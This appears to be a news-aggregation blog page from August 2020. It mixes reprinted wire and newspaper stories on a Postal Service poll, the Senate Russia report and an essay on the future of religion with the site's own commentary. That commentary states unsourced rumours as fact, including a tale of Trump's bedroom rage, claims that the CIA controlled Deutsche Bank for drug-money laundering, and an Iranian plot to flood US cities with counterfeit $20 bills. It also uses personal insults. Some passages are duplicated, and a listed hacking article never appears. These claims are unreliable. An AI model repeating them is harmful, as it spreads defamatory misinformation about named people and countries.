Warning: count(): Parameter must be an array or an object that implements Countable in /home/tbrnew5/public_html/wp-includes/post-template.php on line 284

Warning: count(): Parameter must be an array or an object that implements Countable in /home/tbrnew5/public_html/wp-includes/post-template.php on line 284

Warning: count(): Parameter must be an array or an object that implements Countable in /home/tbrnew5/public_html/wp-includes/post-template.php on line 284

Warning: count(): Parameter must be an array or an object that implements Countable in /home/tbrnew5/public_html/wp-includes/post-template.php on line 284

TBR News August 19, 2020

Aug 19 2020

The Voice of the White House

Comments for August 19, 2020; I was just talking with a connected person I know in DC and they told me the following hysterically entertaining story about Trump. This is a person who knows what is going on, not some slack-jawed blogger. Trump hates the USPS. Jeff Bezos, who owns the WAPO and Amazon, does not like Fat Donnie and his paper goes after him.

Trump will not tolerate criticism so he demanded the USPS jack up the postal rates on Amazon products. They refused so he made war on them.

Also, he does not want mail in ballots in the November election because if he loses, he wants to create an uproar and prolong his stay in office.

He put a mindless stooge in charge of the USPS and this chinless wonder started strangling the USPS but Trump boasted what he was doing and the public uproar was growing in volume and violence. A mob attacked the Trump stooge’s home and the House was going to rip him to bits so he backed off and left the USPS alone.

Following this defeat, Trump apparently locked himself in his bedroom and began to scream and break things. The Secret Service guards heard the smashing and screaming but could not get in because Fat Donnie had the locks changed. They smashed down the door and there was the Great One in his undies, face contorted with rage as he smashed lamps etc. A doctor was called and Trump got a calm-down shot.

He apparently had soiled himself in his rage. I would love pictures but one can image the One- Sent-By-God-to-Rule-Us looking like he had just sat on a pumpkin pie!

          Sic transit Gloria mundi!



The Table of Contents

  • Bipartisan majority of Americans want more money for Postal Service: Reuters/Ipsos Poll
  • Senate trumps Mueller with its Russian collusion report
  • Trump campaign Russia contacts were ‘grave threat’, says Senate report
  • Editorial: How Trump works for the Russians
  • Official Drug Money Laundering
  • An End Game in the Middle East
  • Tomorrow’s Gods: What is the future of religion?
  • Law enforcement websites hit by blueleaks may have been easy to hack




Bipartisan majority of Americans want more money for Postal Service: Reuters/Ipsos Poll

August 19, 2020

by Chris Kahn


NEW YORK (Reuters) – A bipartisan majority of Americans want the government to spend more money on the U.S. Postal Service, and most agree that mail delivery will be a vital part of the November election, a Reuters/Ipsos public opinion poll released on Wednesday found.

The Aug. 14-18 poll took place in the middle of an uproar over changes to mail service ordered by Postmaster General Louis DeJoy, a large donor to President Donald Trump.

After complaints that cuts could interfere with mail-in voting, which has gained in importance due to the coronavirus pandemic, DeJoy said on Tuesday he would pause any further changes.

The poll found that 78% of Americans, including 92% of Democrats and 67% of Republicans, agreed “a well-functioning United States Postal Service is important to having a smooth and successful election during the coronavirus pandemic.”

Nearly three-quarters of Americans, including 88% of Democrats and 60% of Republicans, agreed “funding for the United States Postal Service should be increased to ensure Americans’ mail gets delivered in a timely fashion.”

The Democratic-controlled House of Representatives has already approved $25 billion in new postal funding, which Trump has criticized as too much. White House Chief of Staff Mark Meadows said this week that the president may support additional funding for the agency as part of a broader spending package for coronavirus relief, however.


According to the poll, 56% of U.S. adults disapprove of the president’s overall performance in office, with 39% approving and 5% unsure.

Democratic presidential challenger Joe Biden leads Trump in support among registered voters by 8 percentage points.

The top three things that registered voters said they wanted from their president were an ability to lead the U.S. recovery from the coronavirus pandemic, an ability to “restore trust” in government, and strong ideas about improving the economy.

Biden has a clear advantage with the first two, according to the poll: 46% of registered voters think Biden would be better at steering America’s pandemic response, while 36% said Trump would be better. And 45% said Biden would be better at restoring trust in government, while 34% said it was Trump.

When it comes to shaping the U.S. economy, 46% said Trump would be better, compared with 40% who said Biden would be better.

The poll overlapped with the first days of the Aug. 17-20 Democratic National Convention in Milwaukee, as the 2020 U.S. presidential campaign shifted into a higher gear.

Former first lady Michelle Obama capped the convention’s first day on Monday night by saying Trump was “clearly in over his head.”

The Reuters/Ipsos poll was conducted online, in English, throughout the United States. It gathered responses from 1,391 U.S. adults, including 617 who identified as Democrats and 523 who identified as Republicans. The poll has a credibility interval, a measure of precision, of about five percentage points.

Editing by Scott Malone and Sonya Hepinstall


Senate trumps Mueller with its Russian collusion report

1,000-page document lays bare a stunning web of contacts between the 2016 Trump campaign and Russia.

August 19, 2020

by Tim Walker

The Guardian

More than a year after the messy conclusion of the Mueller investigation, the US senate intelligence committee has released its 1,000-page bipartisan report into the stunning array of links between the Trump campaign and Russia during the 2016 election.

Among the explosive details is the bald assertion that a Russian national who worked with the president’s campaign was in fact a career spy. The senate panel identifies Konstantin Kilimnik, a longtime associate of the then-Trump campaign manager, Paul Manafort, as an officer of the GRU, and cites evidence – some of it redacted – linking him to the hacking of Democratic party emails.


Trump campaign Russia contacts were ‘grave threat’, says Senate report

August 19, 2020

BBC News

A Republican-led Senate panel has concluded that Trump campaign contacts with Russia in 2016 “represented a grave counterintelligence threat”.

The nearly 1,000-page intelligence committee report laid out links between President Donald Trump’s associates and Kremlin officials.

It is the fifth and probably final report into Russian meddling during the 2016 presidential election.

When asked about the report on Tuesday, Mr Trump said he “didn’t read it”.

According to the committee, the expansive report is “the most comprehensive description to date of Russia’s activities and the threat they posed”.

It details the interactions between Trump campaign staff and Russian operatives, including a Kremlin intelligence officer.

The findings also confirm aspects of the special counsel Robert Mueller’s report from his criminal probe into the Trump campaign and Russian election interference.

What’s in the report?

The bipartisan senate committee investigation was not a criminal inquiry, but was meant to offer recommendations to prevent future interference.

The report concluded that the Kremlin “engaged in an aggressive, multifaceted effort to influence, or attempt to influence” the 2016 election, and that some Trump associates were keen on help from Russia.

It said the Trump campaign, with many affiliates who had no government experience, were easy targets for foreign influence.

The committee also highlighted the role of former Trump campaign manager Paul Manafort, who was convicted of conspiracy and fraud charges during the Mueller inquiry.

Manafort: Trump’s former campaign chair

Manafort’s contact with Russian oligarchs and intelligence affiliates – namely Konstantin Kilimnik- and his access to Mr Trump “created opportunities for Russian intelligence services to exert influence over, and acquire confidential information on, the Trump Campaign,” the committee alleges.

The committee also reported that Russian President Vladimir Putin was behind the WikiLeaks effort to hack Democratic Party officials and leak information to damage Hillary Clinton’s campaign.

The report confirmed the Kremlin used Manafort and WikiLeaks to help Mr Trump win the 2016 election, and that WikiLeaks was aware it was assisting Russian intelligence.

It also found that the Trump campaign tried to obtain information about the leak from Roger Stone – a longtime Trump ally and adviser. The committee was not able to determine how much access Stone had to WikiLeaks, however.

Mr Trump has said he does not recall speaking about WikiLeaks with Stone, but Tuesday’s report found that “despite Trump’s recollection”, he did speak to Stone and other campaign staff about the matter “on multiple occasions”.

Stone was convicted of lying to Congress, obstruction and witness tampering, but pardoned by Mr Trump in July.

What did Trump say?

The president has long derided claims that his election victory was influenced by Russia, at times questioning findings from his own agencies.

In response to a question about the report, Mr Trump told reporters: “I don’t know anything about it. I didn’t read it.”

He added: “It’s all a hoax.”

White House spokesman Judd Deere, however, said the report was further confirmation that “that there was absolutely no collusion between the Trump campaign and Russia”.


Editorial: How Trump works for the Russians

January 18, 2019

San Francisco Chronicle Editorial Board

Like much about his administration, the possibility that President Trump is a Russian asset has the disorienting quality of being simultaneously unthinkable and plausible. The recent report that the FBI opened an investigation into whether Trump was working for Moscow defies assumptions outside “The Manchurian Candidate” and other fictions. And yet evidence of his furthering Vladimir Putin’s goals is plentiful and plain.

The FBI opened the counterintelligence probe in 2017, the New York Times reported, soon after Trump fired its director, James Comey, and explicitly linked his decision to the bureau’s investigation of Russian interference in the 2016 campaign. The inquiry’s central concern was whether the president, either as secret agent or useful idiot, was advancing Russia’s interests in contravention of the United States’. Days after the investigation began, newly appointed Special Counsel Robert Mueller took it over, according to the Times, along with the continuing criminal investigation of the Trump team’s relationship with Russia.

Trump’s initial failure to deny the report — in the friendly confines of a Fox News interview, no less — wasn’t reassuring. Neither was the Washington Post’s subsequent revelation that Trump took pains to conceal the content of his discussions with Putin, even confiscating an interpreter’s notes. (The president eventually got around to insisting he “never worked for Russia,” a dramatic narrowing of his earlier, false claim to have “nothing to do with Russia.”)

The worst possible implication of these reports, that Putin has an operative in the White House, is dark and outlandish indeed. But Trump pursues the Russian strongman’s priorities openly and overtly, even when they conflict with U.S. interests.

His assault on NATO is a glaring example. An American project to counter the Soviet Union, NATO is a heretofore bipartisan pillar of U.S. foreign policy as well as a wartime ally, 9/11 being the only instance in which the compact’s mutual protection guarantee has been invoked. For Putin, on the other hand, NATO is a bete noire. He has gone to great lengths to thwart its minutest expansions, most recently fomenting discontent over Macedonia’s accession by meddling in Greek elections. (Sound familiar?)

Like much about his administration, the possibility that President Trump is a Russian asset has the disorienting quality of being simultaneously unthinkable and plausible. The recent report that the FBI opened an investigation into whether Trump was working for Moscow defies assumptions outside “The Manchurian Candidate” and other fictions. And yet evidence of his furthering Vladimir Putin’s goals is plentiful and plain.

The FBI opened the counterintelligence probe in 2017, the New York Times reported, soon after Trump fired its director, James Comey, and explicitly linked his decision to the bureau’s investigation of Russian interference in the 2016 campaign. The inquiry’s central concern was whether the president, either as secret agent or useful idiot, was advancing Russia’s interests in contravention of the United States’. Days after the investigation began, newly appointed Special Counsel Robert Mueller took it over, according to the Times, along with the continuing criminal investigation of the Trump team’s relationship with Russia.

Trump’s initial failure to deny the report — in the friendly confines of a Fox News interview, no less — wasn’t reassuring. Neither was the Washington Post’s subsequent revelation that Trump took pains to conceal the content of his discussions with Putin, even confiscating an interpreter’s notes. (The president eventually got around to insisting he “never worked for Russia,” a dramatic narrowing of his earlier, false claim to have “nothing to do with Russia.”)

The worst possible implication of these reports, that Putin has an operative in the White House, is dark and outlandish indeed. But Trump pursues the Russian strongman’s priorities openly and overtly, even when they conflict with U.S. interests.

His assault on NATO is a glaring example. An American project to counter the Soviet Union, NATO is a heretofore bipartisan pillar of U.S. foreign policy as well as a wartime ally, 9/11 being the only instance in which the compact’s mutual protection guarantee has been invoked. For Putin, on the other hand, NATO is a bete noire. He has gone to great lengths to thwart its minutest expansions, most recently fomenting discontent over Macedonia’s accession by meddling in Greek elections. (Sound familiar?)

Trump’s performance at a NATO summit last year, where he insulted, berated and threatened to forsake key European allies, left little doubt that he shares Putin’s attitude toward the trans-Atlantic alliance. Though Trump ended the gathering on an incongruously conciliatory note, the Times recently reported that he repeatedly returns to the idea of withdrawing from NATO despite his advisers’ best efforts.

U.S. retreat from Syria is another Kremlin priority to which Trump hews in spite of his subordinates. His abrupt announcement last month that 2,000 American troops would leave the conflict brought about the resignation of Defense Secretary Jim Mattis, a NATO alumnus.

Granted, withdrawal from military conflicts and even alliances might be favored for reasons that have nothing to do with Russia. But the administration’s favors to Moscow extend to the otherwise inexplicable. Take last month’s lifting of sanctions against companies linked to the Russian oligarch Oleg Deripaska, a close Putin ally. Reversing the sanctions, which were a response to Russia’s attack on the U.S. election, was so controversial that nearly 150 Republican lawmakers voted with Democrats to reinstate them.

Deripaska, by the way, was also close to Trump’s disgraced campaign chairman, Paul Manafort, whose lawyers recently acknowledged that he shared internal polling data with a suspected Russian intelligence associate. Not coincidentally, last week Trump lawyer Rudy Giuliani abandoned his long-standing insistence that there was “no collusion” between the campaign and Russia.

Even Trump’s handling of domestic affairs reflects Russia’s designs against Western efficacy. Consider the unprecedented government shutdown that is crippling agencies responsible for national security.

Whether the president has worked for the Russians in the counterintelligence sense isn’t known. But he has clearly worked out for them very well.


Official Drug Money Laundering


It is no secret in various official circles here in Washington, that the failed Deutsche Bank was firmly in the hands of the CIA and was used by them to finance various projects, to include assisting their Russian drug running friends to launder money. Like Trump, Deutsche Bank has been scrutinized for its dealings in Russia. The bank paid more than $600 million to regulators in 2017 and agreed to a consent order that cited “serious compliance deficiencies” that “spanned Deutsche Bank’s global empire.” The case focused on “mirror trades,” which Deutsche Bank facilitated between 2011 and 2015. The trades were sham transactions whose sole purpose appeared to be to illicitly convert rubles into pounds and dollars — some $10 billion worth.

The bank was “laundering money for wealthy Russians and people connected to Putin and the Kremlin in a variety of ways for almost the exact time period that they were doing business with Donald Trump,” “And all of that money through Deutsche Bank was being channeled through the same exact legal entity in the U.S. that was handling the Donald Trump relationship in the U.S. And so there are a lot of coincidences here.”

It wasn’t just Donald Trump who maintained a warm relationship with Deutsche. The German bank looked after his entire family. Jared Kushner, Ivanka, and Kushner’s mother Seryl Stadtmauer were all Deutsche clients.

The large German financial conglomerate Deutsche Bank, later to become one of Donald Trump’s favored institutions, became entangled with Russia after the bank bought boutique investment bank UFG in order to gain entry into Moscow’s financial markets. UFG’s chairman, Charles Ryan, was an American banker; his partner was Boris Fyodorov, formerly Russia’s Finance Minister in the Yeltsin administration. Deutsche’s future co-CEO, Anshu Jain, was the one who wants Deutsche to become more involved with Russia. Other investment banks soon found Deutsche’s business practices suspicious. Christopher Barter, at the time the CEO of Goldman Sachs Moscow, said later: “They were doing some very curious things. Nobody could make sense of their business. We found the nature and concentration of their business with VTB (Vneshtorgbank) quite galling. Nobody else could touch VTB.”

VTB was known to be deeply connected to Russian intelligence, the FSB.

Trump is also well-known to have been up to his wattled neck in this project, a project to which elements of the German government not infiltrated by the CIA were informed and have reacted by firing known CIA-paid bank employees and firing carload lots of them, 74,000 in total. Eventually this will come out, hopefully before the next election.


An End Game in the Middle East

Trump loves to use sanctions to threaten or punish perceived disobedient individials or countries. These do have an effect but in the long run, they create so much animosity against the United States that they are proving to be a weapon with double edges.

There is more to economic warfare than sanctions and Trump does not realize that while a country like Iran cannot sanction the United States, they do have the ability to wreak economic havoc in retaliation to Trump’s damaging sanctions.

Emulating the German ‘Operation Bernhard’ and that business in ’69 in Vancouver, Canada, the Iranians are about to dump in American cities, very good fake $20 counterfeit bills.

Not pass but dump.

They have used twenty-two sets of serial numbers on their fake money. Target cities are: New York, Chicago, Los Angeles, Dallas, Denver, Boston, Miami and St. Louis.

This would for a certainty result in chaos as retail business, and even banks, would refuse to accept any $20 bill.

This is Iran’s payback for the sanctions.

Also, the Iranians have a method to interfere with the NYSE board.

If they dropped, say, ten leading stocks on the board, the bots would take over and we would have a reprise of ’29.

No shooting, understand, but devastation.

And if a recently prepared false flag were put in motion, Hezbollah, a Shiite Iranian ally, would blanket Israel with a flood of surface-to-surface missiles (mostly Russian and at least one type that is in a silo.) A significant number of these missiles are GPS directed and can pinpoint any target with considerable accuracy.

Israel’s vaunted ‘Iron Dome’ missile protection would only be able to interdict a very small portion of this apocalyptic flood.

That is why Fat Bibi the Crossdresser is, and has been, begging Fat Donald the Drug Money Launderer to carpet-bomb all of southern Lebanon.

If Fat Donald agrees, someone in the Pentagon will alert their Russian opposite numbers and the games will start at once.


Tomorrow’s Gods: What is the future of religion?

Throughout history, people’s faith and their attachments to religious institutions have transformed, argues Sumit Paul-Choudhury. So what’s next?

August 2 2019

by Sumit Paul-Choudhury

BBC News

Before Mohammed, before Jesus, before Buddha, there was Zoroaster. Some 3,500 years ago, in Bronze Age Iran, he had a vision of the one supreme God. A thousand years later, Zoroastrianism, the world’s first great monotheistic religion, was the official faith of the mighty Persian Empire, its fire temples attended by millions of adherents. A thousand years after that, the empire collapsed, and the followers of Zoroaster were persecuted and converted to the new faith of their conquerors, Islam.

Another 1,500 years later – today – Zoroastrianism is a dying faith, its sacred flames tended by ever fewer worshippers

We take it for granted that religions are born, grow and die – but we are also oddly blind to that reality. When someone tries to start a new religion, it is often dismissed as a cult. When we recognise a faith, we treat its teachings and traditions as timeless and sacrosanct. And when a religion dies, it becomes a myth, and its claim to sacred truth expires. Tales of the Egyptian, Greek and Norse pantheons are now considered legends, not holy writ.

Even today’s dominant religions have continually evolved throughout history. Early Christianity, for example, was a truly broad church: ancient documents include yarns about Jesus’ family life and testaments to the nobility of Judas. It took three centuries for the Christian church to consolidate around a canon of scriptures – and then in 1054 it split into the Eastern Orthodox and Catholic churches. Since then, Christianity has continued both to grow and to splinter into ever more disparate groups, from silent Quakers to snake-handling Pentecostalists.

If you believe your faith has arrived at ultimate truth, you might reject the idea that it will change at all. But if history is any guide, no matter how deeply held our beliefs may be today, they are likely in time to be transformed or transferred as they pass to our descendants – or simply to fade away.

If religions have changed so dramatically in the past, how might they change in the future? Is there any substance to the claim that belief in gods and deities will die out altogether? And as our civilisation and its technologies become increasingly complex, could entirely new forms of worship emerge?

To answer these questions, a good starting point is to ask: why do we have religion in the first place?

Reason to believe

One notorious answer comes from Voltaire, the 18th Century French polymath, who wrote: “If God did not exist, it would be necessary to invent him.”Because Voltaire was a trenchant critic of organised religion, this quip is often quoted cynically. But in fact, he was being perfectly sincere. He was arguing that belief in God is necessary for society to function, even if he didn’t approve of the monopoly the church held over that belief.

Many modern students of religion agree. The broad idea that a shared faith serves the needs of a society is known as the functionalist view of religion. There are many functionalist hypotheses, from the idea that religion is the “opium of the masses”, used by the powerful to control the poor, to the proposal that faith supports the abstract intellectualism required for science and law. One recurring theme is social cohesion: religion brings together a community, who might then form a hunting party, raise a temple or support a political party

Those faiths that endure are “the long-term products of extraordinarily complex cultural pressures, selection processes, and evolution”, writes Connor Wood of the Center for Mind and Culture in Boston, Massachusetts on the religious reference website Patheos, where he blogs about the scientific study of religion. New religious movements are born all the time, but most don’t survive long. They must compete with other faiths for followers and survive potentially hostile social and political environments.

Under this argument, any religion that does endure has to offer its adherents tangible benefits. Christianity, for example, was just one of many religious movements that came and mostly went during the course of the Roman Empire. According to Wood, it was set apart by its ethos of caring for the sick – meaning more Christians survived outbreaks of disease than pagan Romans. Islam, too, initially attracted followers by emphasising honour, humility and charity – qualities which were not endemic in turbulent 7th-Century Arabia.

Given this, we might expect the form that religion takes to follow the function it plays in a particular society – or as Voltaire might have put it, that different societies will invent the particular gods they need. Conversely, we might expect similar societies to have similar religions, even if they have developed in isolation. And there is some evidence for that – although when it comes to religion, there are always exceptions to any rule.

Hunter-gatherers, for example, tend to believe that all objects – whether animal, vegetable or mineral – have supernatural aspects (animism) and that the world is imbued with supernatural forces (animatism). These must be understood and respected; human morality generally doesn’t figure significantly. This worldview makes sense for groups too small to need abstract codes of conduct, but who must know their environment intimately. (An exception: Shinto, an ancient animist religion, is still widely practised in hyper-modern Japan.)

At the other end of the spectrum, the teeming societies of the West are at least nominally faithful to religions in which a single watchful, all-powerful god lays down, and sometimes enforces, moral instructions: Yahweh, Christ and Allah. The psychologist Ara Norenzayan argues it was belief in these “Big Gods” that allowed the formation of societies made up of large numbers of strangers. Whether that belief constitutes cause or effect has recently been disputed, but the upshot is that sharing a faith allows people to co-exist (relatively) peacefully. The knowledge that Big God is watching makes sure we behave ourselves.

Or at least, it did. Today, many of our societies are huge and multicultural: adherents of many faiths co-exist with each other – and with a growing number of people who say they have no religion at all. We obey laws made and enforced by governments, not by God. Secularism is on the rise, with science providing tools to understand and shape the world.

Given all that, there’s a growing consensus that the future of religion is that it has no future.

Imagine there’s no heaven

Powerful intellectual and political currents have driven this proposition since the early 20th Century. Sociologists argued that the march of science was leading to the “disenchantment” of society: supernatural answers to the big questions were no longer felt to be needed. Communist states like Soviet Russia and China adopted atheism as state policy and frowned on even private religious expression. In 1968, the eminent sociologist Peter Berger told the New York Times that by “the 21st Century, religious believers are likely to be found only in small sects, huddled together to resist a worldwide secular culture”.

Now that we’re actually in the 21st Century, Berger’s view remains an article of faith for many secularists – although Berger himself recanted in the 1990s. His successors are emboldened by surveys showing that in many countries, increasing numbers of people are saying they have no religion. That’s most true in rich, stable countries like Sweden and Japan, but also, perhaps more surprisingly, in places like Latin America and the Arab world. Even in the US, long a conspicuous exception to the axiom that richer countries are more secular, the number of “nones” has been rising sharply. In the 2018 General Social Survey of US attitudes, “no religion” became the single largest group, edging out evangelical Christians.

Despite this, religion is not disappearing on a global scale – at least in terms of numbers. In 2015, the Pew Research Center modelled the future of the world’s great religions based on demographics, migration and conversion. Far from a precipitous decline in religiosity, it predicted a modest increase in believers, from 84% of the world’s population today to 87% in 2050. Muslims would grow in number to match Christians, while the number unaffiliated with any religion would decline slightly

The pattern Pew predicted was of “the secularising West and the rapidly growing rest”. Religion will continue to grow in economically and socially insecure places like much of sub-Saharan Africa – and to decline where they are stable. That chimes with what we know about the deep-seated psychological and neurological drivers of belief. When life is tough or disaster strikes, religion seems to provide a bulwark of psychological (and sometimes practical) support. In a landmark study, people directly affected by the 2011 earthquake in Christchurch, New Zealand became significantly more religious than other New Zealanders, who became marginally less religious.

We also need to be careful when interpreting what people mean by “no religion”. “Nones” may be disinterested in organised religion, but that doesn’t mean they are militantly atheist. In 1994, the sociologist Grace Davie classified people according to whether they belonged to a religious group and/or believed in a religious position. The traditionally religious both belonged and believed; hardcore atheists did neither. Then there are those who belong but don’t believe – parents attending church to get a place for their child at a faith school, perhaps. And, finally, there are those who believe in something, but don’t belong to any group.

The research suggests that the last two groups are significant. The Understanding Unbelief project at the University of Kent in the UK is conducting a three-year, six-nation survey of attitudes among those who say they don’t believe God exists (“atheists”) and those who don’t think it’s possible to know if God exists (“agnostics”). In interim results released in May 2019, the researchers found that few unbelievers actually identify themselves by these labels, with significant minorities opting for a religious identity.

What’s more, around three-quarters of atheists and nine out of 10 agnostics are open to the existence of supernatural phenomena, including everything from astrology to supernatural beings and life after death. Unbelievers “exhibit significant diversity both within, and between, different countries.

Accordingly, there are very many ways of being an unbeliever”, the report concluded – including, notably, the dating-website cliche “spiritual, but not religious”. Like many cliches, it’s rooted in truth. But what does it actually mean?

          The old gods return

In 2005, Linda Woodhead wrote The Spiritual Revolution, in which she described an intensive study of belief in the British town of Kendal. Woodhead and her co-author found that people were rapidly turning away from organised religion, with its emphasis on fitting into an established order of things, towards practices designed to accentuate and foster individuals’ own sense of who they are. If the town’s Christian churches did not embrace this shift, they concluded, congregations would dwindle into irrelevance while self-guided practices would become the mainstream in a “spiritual revolution”.

Today, Woodhead says that revolution has taken place – and not just in Kendal. Organised religion is waning in the UK, with no real end in sight. “Religions do well, and always have done, when they are subjectively convincing – when you have the sense that God is working for you,” says Woodhead, now professor of sociology of religion at the University of Lancaster in the UK.

In poorer societies, you might pray for good fortune or a stable job. The “prosperity gospel” is central to several of America’s megachurches, whose congregations are often dominated by economically insecure congregations. But if your basic needs are well catered for, you are more likely to be seeking fulfilment and meaning. Traditional religion is failing to deliver on this, particularly where doctrine clashes with moral convictions that arise from secular society – on gender equality, say.

In response, people have started constructing faiths of their own.

What do these self-directed religions look like? One approach is syncretism, the “pick and mix” approach of combining traditions and practices that often results from the mixing of cultures. Many religions have syncretistic elements, although over time they are assimilated and become unremarkable. Festivals like Christmas and Easter, for example, have archaic pagan elements, while daily practice for many people in China involves a mixture of Mahayana Buddhism, Taoism and Confucianism. The joins are easier to see in relatively young religions, such as Vodoun or Rastafarianism.

An alternative is to streamline. New religious movements often seek to preserve the central tenets of an older religion while stripping it of trappings that may have become stifling or old-fashioned. In the West, one form this takes is for humanists to rework religious motifs: there have been attempts to rewrite the Bible without any supernatural elements, calls for the construction of “atheist temples” dedicated to contemplation. And the “Sunday Assembly” aims to recreate the atmosphere of a lively church service without reference to God. But without the deep roots of traditional religions, these can struggle: the Sunday Assembly, after initial rapid expansion, is now reportedly struggling to keep up its momentum.

But Woodhead thinks the religions that might emerge from the current turmoil will have much deeper roots. The first generation of spiritual revolutionaries, coming of age in the 1960s and 1970s, were optimistic and universalist in outlook, happy to take inspiration from faiths around the world. Their grandchildren, however, are growing up in a world of geopolitical stresses and socioeconomic angst; they are more likely to hark back to supposedly simpler times. “There is a pull away from global universality to local identities,” says Woodhead. “It’s really important that they’re your gods, they weren’t just made up.”

In the European context, this sets the stage for a resurgence of interest in paganism. Reinventing half-forgotten “native” traditions allows the expression of modern concerns while retaining the patina of age. Paganism also often features divinities that are more like diffuse forces than anthropomorphic gods; that allows people to focus on issues they feel sympathetic towards without having to make a leap of faith to supernatural deities.

In Iceland, for example, the small but fast-growing Ásatrú faith has no particular doctrine beyond somewhat arch celebrations of Old Norse customs and mythology, but has been active on social and ecological issues. Similar movements exist across Europe, such as Druidry in the UK. Not all are liberally inclined. Some are motivated by a desire to return to what they see as conservative “traditional” values – leading in some cases to clashes over the validity of opposing beliefs.

These are niche activities at the moment, and might sometimes be more about playing with symbolism than heartfelt spiritual practice. But over time, they canevolve into more heartfelt and coherent belief systems: Woodhead points to the robust adoption of Rodnovery – an often conservative and patriarchal pagan faith based around the reconstructed beliefs and traditions of the ancient Slavs – in the former Soviet Union as a potential exemplar of things to come.

So the nones mostly represent not atheists, nor even secularists, but a mixture of “apatheists” – people who simply don’t care about religion – and practitioners of what you might call “disorganised religion”. While the world religions are likely to persist and evolve for the foreseeable future, we might for the rest of this century see an efflorescence of relatively small religions jostling to break out among these groups. But if Big Gods and shared faiths are key to social cohesion, what happens without them?

One nation under Mammon

One answer, of course, is that we simply get on with our lives. Munificent economies, good government, solid education and effective rule of law can ensure that we rub along happily without any kind of religious framework. And indeed, some of the societies with the highest proportions of non-believers are among the most secure and harmonious on Earth.

What remains debatable, however, is whether they can afford to be irreligious because they have strong secular institutions – or whether being secular has helped them achieve social stability. Religionists say even secular institutions have religious roots: civil legal systems, for example, codify ideas about justice based on social norms established by religions. The likes of the New Atheists, on the other hand, argue that religion amounts to little more than superstition, and abandoning it will enable societies to improve their lot more effectively.

Connor Wood is not so sure. He contends that a strong, stable society like Sweden’s is both extremely complex and very expensive to run in terms of labour, money and energy – and that might not be sustainable even in the short term. “I think it’s pretty clear that we’re entering into a period of non-linear change in social systems,” he says. “The Western consensus on a combination of market capitalism and democracy can’t be taken for granted.”

That’s a problem, since that combination has radically transformed the social environment from the one in which the world religions evolved – and has to some extent supplanted them.

“I’d be careful about calling capitalism a religion, but a lot of its institutions have religious elements, as in all spheres of human institutional life,” says Wood. “The ‘invisible hand’ of the market almost seems like a supernatural entity.”

Financial exchanges, where people meet to conduct highly ritualised trading activity, seem quite like temples to Mammon, too. In fact, religions, even the defunct ones, can provide uncannily appropriate metaphors for many of the more intractable features of modern life.

The pseudo-religious social order might work well when times are good. But when the social contract becomes stressed – through identity politics, culture wars or economic instability – Wood suggests the consequence is what we see today: the rise of authoritarians in country after country. He cites research showing that people ignore authoritarian pitches until they sense a deterioration of social norms.

“This is the human animal looking around and saying we don’t agree how we should behave,” Wood says. “And we need authority to tell us.” It’s suggestive that political strongmen are often hand in glove with religious fundamentalists: Hindu nationalists in India, say, or Christian evangelicals in the US. That’s a potent combination for believers and an unsettling one for secularists: can anything bridge the gap between them?

Mind the gap

Perhaps one of the major religions might change its form enough to win back non-believers in significant numbers. There is precedent for this: in the 1700s, Christianity was ailing in the US, having become dull and formal even as the Age of Reason saw secular rationalism in the ascendant. A new guard of travelling fire-and-brimstone preachers successfully reinvigorated the faith, setting the tone for centuries to come – an event called the “Great Awakenings”.

The parallels with today are easy to draw, but Woodhead is sceptical that Christianity or other world religions can make up the ground they have lost, in the long term. Once the founders of libraries and universities, they are no longer the key sponsors of intellectual thought. Social change undermines religions which don’t accommodate it: earlier this year, Pope Francis warned that if the Catholic Church didn’t acknowledge its history of male domination and sexual abuse it risked becoming “a museum”. And their tendency to claim we sit at the pinnacle of creation is undermined by a growing sense that humans are not so very significant in the grand scheme of things.

Perhaps a new religion will emerge to fill the void? Again, Woodhead is sceptical. “Historically, what makes religions rise or fall is political support,” she says, “and all religions are transient unless they get imperial support.” Zoroastrianism benefited from its adoption by the successive Persian dynasties; the turning point for Christianity came when it was adopted by the Roman Empire. In the secular West, such support is unlikely to be forthcoming, with the possible exception of the US. In Russia, by contrast, the nationalistic overtones of both Rodnovery and the Orthodox church wins them tacit political backing.

But today, there’s another possible source of support: the internet.

Online movements gain followers at rates unimaginable in the past. The Silicon Valley mantra of “move fast and break things” has become a self-evident truth for many technologists and plutocrats. #MeToo started out as a hashtag expressing anger and solidarity but now stands for real changes to long-standing social norms. And Extinction Rebellion has striven, with considerable success, to trigger a radical shift in attitudes to the crises in climate change and biodiversity.

None of these are religions, of course, but they do share parallels with nascent belief systems – particularly that key functionalist objective of fostering a sense of community and shared purpose. Some have confessional and sacrificial elements, too. So, given time and motivation, could something more explicitly religious grow out of an online community? What new forms of religion might these online “congregations” come up with?

We already have some idea.

Deus ex machina

A few years ago, members of the self-declared “Rationalist” community website LessWrong began discussing a thought experiment about an omnipotent, super-intelligent machine – with many of the qualities of a deity and something of the Old Testament God’s vengeful nature.

It was called Roko’s Basilisk. The full proposition is a complicated logic puzzle, but crudely put, it goes that when a benevolent super-intelligence emerges, it will want to do as much good as possible – and the earlier it comes into existence, the more good it will be able to do. So to encourage everyone to do everything possible to help to bring into existence, it will perpetually and retroactively torture those who don’t – including anyone who so much as learns of its potential existence. (If this is the first you’ve heard of it: sorry!)

Outlandish though it might seem, Roko’s Basilisk caused quite a stir when it was first suggested on LessWrong – enough for discussion of it to be banned by the site’s creator. Predictably, that only made the idea explode across the internet – or at least the geekier parts of it – with references to the Basilisk popping up everywhere from news sites to Doctor Who,  despite protestations from some Rationalists that no-one really took it seriously. Their case was not helped by the fact that many Rationalists are strongly committed to other startling ideas about artificial intelligence, ranging from AIs that destroy the world by accident to human-machine hybrids that would transcend all mortal limitations.

Such esoteric beliefs have arisen throughout history, but the ease with which we can now build a community around them is new. “We’ve always had new forms of religiosity, but we haven’t always had enabling spaces for them,” says Beth Singler, who studies the social, philosophical and religious implications of AI at the University of Cambridge. “Going out into a medieval town square and shouting out your unorthodox beliefs was going to get you labelled a heretic, not win converts to your cause.”

The mechanism may be new, but the message isn’t. The Basilisk argumentis in much the same spirit as Pascal’s Wager. The 17th-Century French mathematician suggested non-believers should nonetheless go through the motions of religious observance, just in case a vengeful God does turn out to exist. The idea of punishment as an imperative to cooperate is reminiscent of Norenzayan’s “Big Gods”. And arguments over ways to evade the Basilisk’s gaze are every bit as convoluted as the medieval Scholastics’ attempts to square human freedom with divine oversight.

Even the technological trappings aren’t new. In 1954, Fredric Brown wrote a (very) short story called “Answer”, in which a galaxy-spanning supercomputer is turned on and asked: is there a God? Now there is, comes the reply.

